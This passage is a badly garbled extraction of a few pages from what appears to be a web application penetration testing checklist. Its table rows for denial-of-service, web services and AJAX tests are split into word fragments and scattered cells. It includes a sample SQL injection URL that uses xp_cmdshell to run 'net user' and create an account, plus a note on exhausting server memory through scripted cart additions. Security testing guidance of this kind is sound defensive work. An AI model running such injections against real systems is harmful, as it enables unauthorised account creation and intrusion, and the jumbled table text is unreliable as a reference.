electronic
cart, you can write an
automated script that keeps
adding items to the user cart
until the cart object fills the
server
memory.
88
DS-005
User
Input as a
Loop
Counter User Input
as a Loop
Counter
DS-006
Writing
User
Provided
Data to Disk
- Writing
User
Provided
Data to Disk
User In
put as a
Loop Co
unter
Writin
g User Pr
ovided D
ata to Di
sk
89
DS-007
Failure to
Release
Resources Failure to
Release
Resources
Failure
to Releas
e Resour
ces
90
DS-008
Web
Services
Testing
WS001
Storing
too Much
Data in
Session Storing too
Much Data
in Session
Storin
g too Mu
ch Data i
n Sessio
n
WS
Information
Gathering N.A.
N.A.
curl
--request
POST
--header
Contenttype:
text/xml
--data
@my_reques
t.xml
91
Net Square
wsPawn,
SOAPClient4XG
, CURL, Perl SOAPlite,
OWASP
WebScarab:
Web Services
plugin,
WSDigger
http://api.go
ogle.com/se
arch/beta2
WS002
WS003
WS004
WS005
Testing
WSDL WSDL
Weakness
XML
Structural
Testing Weak XML
Structure
WSDL
Weaknes
s
XML
contentlevel Testing
- XML
contentlevel
HTTP GET
parameters/
REST
Testing - WS
XML c
ontentlevel
WebScarab,
WSDigger
Weak
XML Stru
cture
WS HT
TP GET p
aramete
rs/REST
https://www.ws.com/accountin
fo?accountnumber=12039475'
exec master..xp_cmdshell 'net
user Vxr
92
WebScarab,
WSDigger
WebScarab,
MetaSploit
HTTP GET
parameters/
REST
WS006
WS007
Ajax
Testing
AJ-001
AJ-002
pass /Add
&userId=asi9485jfuhe92
Naughty
SOAP
attachment
s - WS
Naughty
SOAP
attachment
s
Replay
Testing - WS
Replay
Testing
AJAX
Vulnerabiliti
es - N.A.
WS Na
ughty SO
AP attac
hments
WS Re
play Test
ing
AJAX
Testing AJAX
AJAX
weaknes
s
N.A.
* XMLHttpRequest
Vulnerabilitie, SQL Injectio, XSS,
DOM based XSS, JSON/XML/XSLT
Injection
* AJAX Bridging - Cross website
requests are sent through this
method
* Cross Site Request Forgery
(CSRF)
* DOS - Multiple
XMLHttpRequests
Parse the HTML and JavaScript
files and
using a proxy to observe traffic.
93
WebScarab,
Ethreal,
WireShark,
TCPReplay
Proxy tools,
Firebug
OWASP Sprajax
weakness
94
XIII.
95